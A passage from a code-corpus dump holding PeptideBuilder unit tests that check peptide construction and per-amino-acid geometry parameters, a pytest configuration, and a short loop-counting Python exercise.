PeptideBuilder.initialize_res(\"A\")\n for aa in \"CDEFGHIKLMNPQRSTVWY\":\n PeptideBuilder.add_residue(structure, aa)\n\n # extract peptide from structure and compare to expected\n ppb = PPBuilder()\n pp = next(iter(ppb.build_peptides(structure)))\n assert pp.get_sequence() == \"ACDEFGHIKLMNPQRSTVWY\"\n\n assert compare_to_reference(structure, \"extended.pdb\")\n\n\ndef test_add_residue2():\n \"\"\"\n Build a helix containing all 20 amino acids, with slowly varying backbone angles\n \"\"\"\n phi = -60\n psi_im1 = -40\n geo = Geometry.geometry(\"A\")\n geo.phi = phi\n geo.psi_im1 = psi_im1\n structure = PeptideBuilder.initialize_res(geo)\n\n for aa in \"CDEFGHIKLMNPQRSTVWY\":\n phi += 1\n psi_im1 -= 1\n geo = Geometry.geometry(aa)\n geo.phi = phi\n geo.psi_im1 = psi_im1\n PeptideBuilder.add_residue(structure, geo)\n\n assert compare_to_reference(structure, \"helix.pdb\")\n\n\ndef test_make_structure_from_geos():\n \"\"\"Build a helix containing all 20 amino acids from list of geometries.\n The structure should be identical to `extended.pdb`\n \"\"\"\n geos = [Geometry.geometry(aa) for aa in \"ACDEFGHIKLMNPQRSTVWY\"]\n structure = PeptideBuilder.make_structure_from_geos(geos)\n assert compare_to_reference(structure, \"extended.pdb\")\n\n\ndef test_make_extended_structure():\n \"\"\"\n Build a peptide containing all 20 amino acids in extended conformation.\n The structure should be identical to `extended.pdb`\n \"\"\"\n structure = PeptideBuilder.make_extended_structure(\"ACDEFGHIKLMNPQRSTVWY\")\n assert compare_to_reference(structure, \"extended.pdb\")\n\n # test unit tests by comparing structures that don't match\n structure = PeptideBuilder.make_extended_structure(\"ACDEFGHIKLMNPQRSTVW\")\n assert not compare_to_reference(structure, \"extended.pdb\")\n structure = PeptideBuilder.make_extended_structure(\"ACDEFGHIKLMNPQRSTVWW\")\n assert not compare_to_reference(structure, \"extended.pdb\")\n\n\ndef test_make_structure_from_geos2():\n \"\"\"\n Build a peptide containing all 20 amino acids from list of geometries.\n The structure should be identical to `extended.pdb`\n \"\"\"\n geos = [Geometry.geometry(aa) for aa in \"ACDEFGHIKLMNPQRSTVWY\"]\n structure = PeptideBuilder.make_structure_from_geos(geos)\n assert compare_to_reference(structure, \"extended.pdb\")\n\n\ndef test_make_structure():\n \"\"\"\n Build a helix containing all 20 amino acids, with slowly varying\n backbone angles, using make_structure().\n The resulting structure should be identical to `helix.pdb`\n \"\"\"\n phi_list = []\n psi_im1_list = []\n\n for i in range(1, 20):\n phi_list.append(-60 + i)\n psi_im1_list.append(-40 - i)\n structure = PeptideBuilder.make_structure(\n \"ACDEFGHIKLMNPQRSTVWY\", phi_list, psi_im1_list\n )\n assert compare_to_reference(structure, \"helix.pdb\")\n\n\ndef test_make_structure2():\n \"\"\"\n Build a helix containing all 20 amino acids, with slowly varying\n backbone angles, using make_structure(). Now we're changing omega also.\n The first half of the resulting structure should be identical to\n `helix.pdb`, while the second half should be slightly different.\n \"\"\"\n phi_list = []\n psi_im1_list = []\n omega_list = []\n\n for i in range(1, 20):\n phi_list.append(-60 + i)\n psi_im1_list.append(-40 - i)\n omega_list.append(180)\n\n for i in range(9, 19):\n omega_list[i] = -178\n\n structure = PeptideBuilder.make_structure(\n \"ACDEFGHIKLMNPQRSTVWY\", phi_list, psi_im1_list, omega_list\n )\n assert compare_to_reference(structure, \"helix2.pdb\")\n\n\ndef test_add_terminal_OXT():\n \"\"\"\n Build a peptide with terminal OXT\n \"\"\"\n structure = PeptideBuilder.initialize_res(\"A\")\n for aa in \"CDEFGHIKLMNPQRSTVWY\":\n PeptideBuilder.add_residue(structure, aa)\n PeptideBuilder.add_terminal_OXT(structure)\n assert compare_to_reference(structure, \"extended_OXT.pdb\")\n # check that presence of OXT is tested\n assert not compare_to_reference(structure, \"extended.pdb\")\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.625, "avg_line_length": 15.899999618530273, "blob_id": "9eea5ae3ac9b9f8f351570b36ae7bc8ef016e74b", "content_id": "46a19405079eb66be725e6148b4bd6f5ac36947f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 168, "license_type": "permissive", "max_line_length": 35, "num_lines": 10, "path": "/pytest.ini", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "[pytest]\ntestpaths = \n tests\n# PeptideBuilder\nnorecursedirs = dist build examples\naddopts =\n --doctest-modules\n --cov=PeptideBuilder\n -r a\n -v" }, { "alpha_fraction": 0.4838283956050873, "alphanum_fraction": 0.6051862239837646, "avg_line_length": 30.942771911621094, "blob_id": "af220c57b1ac53a007a12ee40ea53dfcaa6f25ca", "content_id": "adcb043c1a19db92074ed88a1e6709216fbe294b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21210, "license_type": "permissive", "max_line_length": 45, "num_lines": 664, "path": "/tests/test_Geometry.py", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "from PeptideBuilder.Geometry import (\n AlaGeo,\n ArgGeo,\n AsnGeo,\n AspGeo,\n CysGeo,\n GlnGeo,\n GluGeo,\n GlyGeo,\n HisGeo,\n IleGeo,\n LeuGeo,\n LysGeo,\n MetGeo,\n PheGeo,\n ProGeo,\n SerGeo,\n ThrGeo,\n TrpGeo,\n TyrGeo,\n ValGeo,\n)\nfrom PeptideBuilder import Geometry\n\n# test all geometries for correct parameters\ndef test_geometry_A():\n g = Geometry.geometry(\"A\")\n assert isinstance(g, AlaGeo)\n\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_C_O_diangle == -60.5\n assert g.N_CA_C_angle == 111.068\n assert g.N_C_CA_CB_diangle == 122.686\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"A\"\n\n\ndef test_geometry_C():\n g = Geometry.geometry(\"C\")\n assert isinstance(g, CysGeo)\n\n assert g.CA_CB_SG_angle == 113.8169\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_SG_length == 1.808\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_SG_diangle == -62.2\n assert g.N_CA_C_O_diangle == -60.0\n assert g.N_CA_C_angle == 110.8856\n assert g.N_C_CA_CB_diangle == 122.5037\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"C\"\n\n\ndef test_geometry_D():\n g = Geometry.geometry(\"D\")\n assert isinstance(g, AspGeo)\n\n assert g.CA_CB_CG_OD1_diangle == -46.7\n assert g.CA_CB_CG_OD2_diangle == 133.3\n assert g.CA_CB_CG_angle == 113.06\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.51\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_OD1_angle == 119.22\n assert g.CB_CG_OD2_angle == 118.218\n assert g.CB_CG_length == 1.52\n assert g.CG_OD1_length == 1.25\n assert g.CG_OD2_length == 1.25\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -66.4\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 111.03\n assert g.N_C_CA_CB_diangle == 122.82\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"D\"\n\n\ndef test_geometry_E():\n g = Geometry.geometry(\"E\")\n assert isinstance(g, GluGeo)\n\n assert g.CA_CB_CG_CD_diangle == -179.8\n assert g.CA_CB_CG_angle == 113.82\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.511\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD_OE1_diangle == -6.2\n assert g.CB_CG_CD_OE2_diangle == 173.8\n assert g.CB_CG_CD_angle == 113.31\n assert g.CB_CG_length == 1.52\n assert g.CD_OE1_length == 1.25\n assert g.CD_OE2_length == 1.25\n assert g.CG_CD_OE1_angle == 119.02\n assert g.CG_CD_OE2_angle == 118.08\n assert g.CG_CD_length == 1.52\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -63.8\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 111.1703\n assert g.N_C_CA_CB_diangle == 122.8702\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"E\"\n\n\ndef test_geometry_F():\n g = Geometry.geometry(\"F\")\n assert isinstance(g, PheGeo)\n\n assert g.CA_CB_CG_CD1_diangle == 93.3\n assert g.CA_CB_CG_CD2_diangle == -86.7\n assert g.CA_CB_CG_angle == 113.85\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5316\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD1_CE1_diangle == 180.0\n assert g.CB_CG_CD1_angle == 120.0\n assert g.CB_CG_CD2_CE2_diangle == 180.0\n assert g.CB_CG_CD2_angle == 120.0\n assert g.CB_CG_length == 1.5\n assert g.CD1_CE1_CZ_angle == 120.0\n assert g.CD1_CE1_length == 1.39\n assert g.CD2_CE2_length == 1.39\n assert g.CE1_CZ_length == 1.39\n assert g.CG_CD1_CE1_CZ_diangle == 0.0\n assert g.CG_CD1_CE1_angle == 120.0\n assert g.CG_CD1_length == 1.39\n assert g.CG_CD2_CE2_angle == 120.0\n assert g.CG_CD2_length == 1.39\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -64.7\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.7528\n assert g.N_C_CA_CB_diangle == 122.6054\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"F\"\n\n\ndef test_geometry_G():\n g = Geometry.geometry(\"G\")\n assert isinstance(g, GlyGeo)\n\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5117\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_C_O_diangle == 180.0\n assert g.N_CA_C_angle == 110.8914\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"G\"\n\n\ndef test_geometry_H():\n g = Geometry.geometry(\"H\")\n assert isinstance(g, HisGeo)\n\n assert g.CA_CB_CG_CD2_diangle == 104.3\n assert g.CA_CB_CG_ND1_diangle == -75.7\n assert g.CA_CB_CG_angle == 113.74\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.4732\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD2_NE2_diangle == 180.0\n assert g.CB_CG_CD2_angle == 130.61\n assert g.CB_CG_ND1_CE1_diangle == 180.0\n assert g.CB_CG_ND1_angle == 122.85\n assert g.CB_CG_length == 1.49\n assert g.CD2_NE2_length == 1.35\n assert g.CG_CD2_NE2_angle == 108.5\n assert g.CG_CD2_length == 1.35\n assert g.CG_ND1_CE1_angle == 108.5\n assert g.CG_ND1_length == 1.38\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.ND1_CE1_length == 1.32\n assert g.N_CA_CB_CG_diangle == -63.2\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 111.0859\n assert g.N_C_CA_CB_diangle == 122.6711\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"H\"\n\n\ndef test_geometry_I():\n g = Geometry.geometry(\"I\")\n assert isinstance(g, IleGeo)\n\n assert g.CA_CB_CG1_CD1_diangle == 169.8\n assert g.CA_CB_CG1_angle == 110.7\n assert g.CA_CB_CG2_angle == 110.4\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5403\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG1_CD1_angle == 113.97\n assert g.CB_CG1_length == 1.527\n assert g.CB_CG2_length == 1.527\n assert g.CG1_CD1_length == 1.52\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG1_diangle == 59.7\n assert g.N_CA_CB_CG2_diangle == -61.6\n assert g.N_CA_C_O_diangle == -60.0\n assert g.N_CA_C_angle == 109.7202\n assert g.N_C_CA_CB_diangle == 123.2347\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"I\"\n\n\ndef test_geometry_K():\n g = Geometry.geometry(\"K\")\n assert isinstance(g, LysGeo)\n\n assert g.CA_CB_CG_CD_diangle == -178.1\n assert g.CA_CB_CG_angle == 113.83\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.54\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD_CE_diangle == -179.6\n assert g.CB_CG_CD_angle == 111.79\n assert g.CB_CG_length == 1.52\n assert g.CD_CE_NZ_angle == 124.79\n assert g.CD_CE_length == 1.46\n assert g.CE_NZ_length == 1.33\n assert g.CG_CD_CE_NZ_diangle == 179.6\n assert g.CG_CD_CE_angle == 111.68\n assert g.CG_CD_length == 1.52\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -64.5\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 111.08\n assert g.N_C_CA_CB_diangle == 122.76\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"K\"\n\n\ndef test_geometry_L():\n g = Geometry.geometry(\"L\")\n assert isinstance(g, LeuGeo)\n\n assert g.CA_CB_CG_CD1_diangle == 174.9\n assert g.CA_CB_CG_CD2_diangle == 66.7\n assert g.CA_CB_CG_angle == 116.1\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.4647\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD1_angle == 110.27\n assert g.CB_CG_CD2_angle == 110.58\n assert g.CB_CG_length == 1.53\n assert g.CG_CD1_length == 1.524\n assert g.CG_CD2_length == 1.525\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -60.1\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.8652\n assert g.N_C_CA_CB_diangle == 122.4948\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"L\"\n\n\ndef test_geometry_M():\n g = Geometry.geometry(\"M\")\n assert isinstance(g, MetGeo)\n\n assert g.CA_CB_CG_SD_diangle == -179.6\n assert g.CA_CB_CG_angle == 113.68\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.4816\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_SD_CE_diangle == 70.1\n assert g.CB_CG_SD_angle == 112.69\n assert g.CB_CG_length == 1.52\n assert g.CG_SD_CE_angle == 100.61\n assert g.CG_SD_length == 1.81\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -64.4\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.9416\n assert g.N_C_CA_CB_diangle == 122.6733\n assert g.SD_CE_length == 1.79\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"M\"\n\n\ndef test_geometry_N():\n g = Geometry.geometry(\"N\")\n assert isinstance(g, AsnGeo)\n\n assert g.CA_CB_CG_ND2_diangle == 121.7\n assert g.CA_CB_CG_OD1_diangle == -58.3\n assert g.CA_CB_CG_angle == 112.62\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.4826\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_ND2_angle == 116.48\n assert g.CB_CG_OD1_angle == 120.85\n assert g.CB_CG_length == 1.52\n assert g.CG_ND2_length == 1.33\n assert g.CG_OD1_length == 1.23\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -65.5\n assert g.N_CA_C_O_diangle == -60.0\n assert g.N_CA_C_angle == 111.5\n assert g.N_C_CA_CB_diangle == 123.2254\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"N\"\n\n\ndef test_geometry_P():\n g = Geometry.geometry(\"P\")\n assert isinstance(g, ProGeo)\n\n assert g.CA_CB_CG_CD_diangle == -34.8\n assert g.CA_CB_CG_angle == 104.21\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.2945\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD_angle == 105.03\n assert g.CB_CG_length == 1.49\n assert g.CG_CD_length == 1.5\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == 29.6\n assert g.N_CA_C_O_diangle == -45.0\n assert g.N_CA_C_angle == 112.7499\n assert g.N_C_CA_CB_diangle == 115.2975\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"P\"\n\n\ndef test_geometry_Q():\n g = Geometry.geometry(\"Q\")\n assert isinstance(g, GlnGeo)\n\n assert g.CA_CB_CG_CD_diangle == -69.6\n assert g.CA_CB_CG_angle == 113.75\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5029\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD_NE2_diangle == 129.5\n assert g.CB_CG_CD_OE1_diangle == -50.5\n assert g.CB_CG_CD_angle == 112.78\n assert g.CB_CG_length == 1.52\n assert g.CD_NE2_length == 1.33\n assert g.CD_OE1_length == 1.24\n assert g.CG_CD_NE2_angle == 116.5\n assert g.CG_CD_OE1_angle == 120.86\n assert g.CG_CD_length == 1.52\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -60.2\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 111.0849\n assert g.N_C_CA_CB_diangle == 122.8134\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"Q\"\n\n\ndef test_geometry_R():\n g = Geometry.geometry(\"R\")\n assert isinstance(g, ArgGeo)\n\n assert g.CA_CB_CG_CD_diangle == -179.2\n assert g.CA_CB_CG_angle == 113.83\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.54\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD_NE_diangle == -179.3\n assert g.CB_CG_CD_angle == 111.79\n assert g.CB_CG_length == 1.52\n assert g.CD_NE_CZ_NH1_diangle == 0.0\n assert g.CD_NE_CZ_NH2_diangle == 180.0\n assert g.CD_NE_CZ_angle == 124.79\n assert g.CD_NE_length == 1.46\n assert g.CG_CD_NE_CZ_diangle == -178.7\n assert g.CG_CD_NE_angle == 111.68\n assert g.CG_CD_length == 1.52\n assert g.CZ_NH1_length == 1.33\n assert g.CZ_NH2_length == 1.33\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.NE_CZ_NH1_angle == 120.64\n assert g.NE_CZ_NH2_angle == 119.63\n assert g.NE_CZ_length == 1.33\n assert g.N_CA_CB_CG_diangle == -65.2\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.98\n assert g.N_C_CA_CB_diangle == 122.76\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"R\"\n\n\ndef test_geometry_S():\n g = Geometry.geometry(\"S\")\n assert isinstance(g, SerGeo)\n\n assert g.CA_CB_OG_angle == 110.773\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_OG_length == 1.417\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_OG_diangle == -63.3\n assert g.N_CA_C_O_diangle == -60.0\n assert g.N_CA_C_angle == 111.2812\n assert g.N_C_CA_CB_diangle == 122.6618\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"S\"\n\n\ndef test_geometry_T():\n g = Geometry.geometry(\"T\")\n assert isinstance(g, ThrGeo)\n\n assert g.CA_CB_CG2_angle == 111.13\n assert g.CA_CB_OG1_angle == 109.18\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5359\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG2_length == 1.53\n assert g.CB_OG1_length == 1.43\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG2_diangle == -60.3\n assert g.N_CA_CB_OG1_diangle == 60.0\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.7014\n assert g.N_C_CA_CB_diangle == 123.0953\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"T\"\n\n\ndef test_geometry_V():\n g = Geometry.geometry(\"V\")\n assert isinstance(g, ValGeo)\n\n assert g.CA_CB_CG1_angle == 110.7\n assert g.CA_CB_CG2_angle == 110.4\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5686\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG1_length == 1.527\n assert g.CB_CG2_length == 1.527\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG1_diangle == 177.2\n assert g.N_CA_CB_CG2_diangle == -63.3\n assert g.N_CA_C_O_diangle == -60.0\n assert g.N_CA_C_angle == 109.7698\n assert g.N_C_CA_CB_diangle == 123.2347\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"V\"\n\n\ndef test_geometry_W():\n g = Geometry.geometry(\"W\")\n assert isinstance(g, TrpGeo)\n\n assert g.CA_CB_CG_CD1_diangle == 96.3\n assert g.CA_CB_CG_CD2_diangle == -83.7\n assert g.CA_CB_CG_angle == 114.1\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5117\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD1_NE1_diangle == 180.0\n assert g.CB_CG_CD1_angle == 127.07\n assert g.CB_CG_CD2_CE2_diangle == 180.0\n assert g.CB_CG_CD2_CE3_diangle == 0.0\n assert g.CB_CG_CD2_angle == 126.66\n assert g.CB_CG_length == 1.5\n assert g.CD1_NE1_length == 1.38\n assert g.CD2_CE2_CZ2_CH2_diangle == 0.0\n assert g.CD2_CE2_CZ2_angle == 120.0\n assert g.CD2_CE2_length == 1.4\n assert g.CD2_CE3_CZ3_angle == 120.0\n assert g.CD2_CE3_length == 1.4\n assert g.CE2_CZ2_CH2_angle == 120.0\n assert g.CE2_CZ2_length == 1.4\n assert g.CE3_CZ3_length == 1.4\n assert g.CG_CD1_NE1_angle == 108.5\n assert g.CG_CD1_length == 1.37\n assert g.CG_CD2_CE2_CZ2_diangle == 180.0\n assert g.CG_CD2_CE2_angle == 108.5\n assert g.CG_CD2_CE3_CZ3_diangle == 180.0\n assert g.CG_CD2_CE3_angle == 133.83\n assert g.CG_CD2_length == 1.43\n assert g.CZ2_CH2_length == 1.4\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -66.4\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.8914\n assert g.N_C_CA_CB_diangle == 122.6112\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"W\"\n\n\ndef test_geometry_Y():\n g = Geometry.geometry(\"Y\")\n assert isinstance(g, TyrGeo)\n\n assert g.CA_CB_CG_CD1_diangle == 93.1\n assert g.CA_CB_CG_CD2_diangle == 273.1\n assert g.CA_CB_CG_angle == 113.8\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5434\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD1_CE1_diangle == 180.0\n assert g.CB_CG_CD1_angle == 120.98\n assert g.CB_CG_CD2_CE2_diangle == 180.0\n assert g.CB_CG_CD2_angle == 120.82\n assert g.CB_CG_length == 1.51\n assert g.CD1_CE1_CZ_OH_diangle == 180.0\n assert g.CD1_CE1_CZ_angle == 120.0\n assert g.CD1_CE1_length == 1.39\n assert g.CD2_CE2_length == 1.39\n assert g.CE1_CZ_OH_angle == 119.78\n assert g.CE1_CZ_length == 1.39\n assert g.CG_CD1_CE1_CZ_diangle == 0.0\n assert g.CG_CD1_CE1_angle == 120.0\n assert g.CG_CD1_length == 1.39\n assert g.CG_CD2_CE2_angle == 120.0\n assert g.CG_CD2_length == 1.39\n assert g.CZ_OH_length == 1.39\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -64.3\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 110.9288\n assert g.N_C_CA_CB_diangle == 122.6023\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"Y\"\n" } ]
9
pedroslark/Acens
https://github.com/pedroslark/Acens
5aa74349a5d2c4bf2c8fb9000e511bbcdb638b6b
a0cbd30f9eaa2a15209a501ccee6f9290e85b140
f3e0e8625c737bf895386e8f41609c7507a33efb
refs/heads/master
2021-04-03T05:39:14.891143
2016-05-27T15:43:03
2016-05-27T15:43:03
59,844,160
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.3961038887500763, "alphanum_fraction": 0.44155845046043396, "avg_line_length": 13, "blob_id": "4acd762582fd30c0fae745c6049f438f4ffc3d4b", "content_id": "5f4e13676c660bb2bd3ebbbc58c049b8da315a5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 27, "num_lines": 11, "path": "/Q2py/Q2.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "count = 0\nfor i in range (9):\n if i != 3:\n for j in range (6):\n print('oi')\n count += 1\nprint count\n\n#48 \"oi's\"\n\n#GG easy\n" }, { "alpha_fraction": 0.42696627974510193, "alphanum_fraction": 0.49438202381134033, "avg_line_length": 8.88888931274414, "blob_id": "2f5f2f4e602ee99629c8bd41ef081eb8b2e1241f", "content_id": 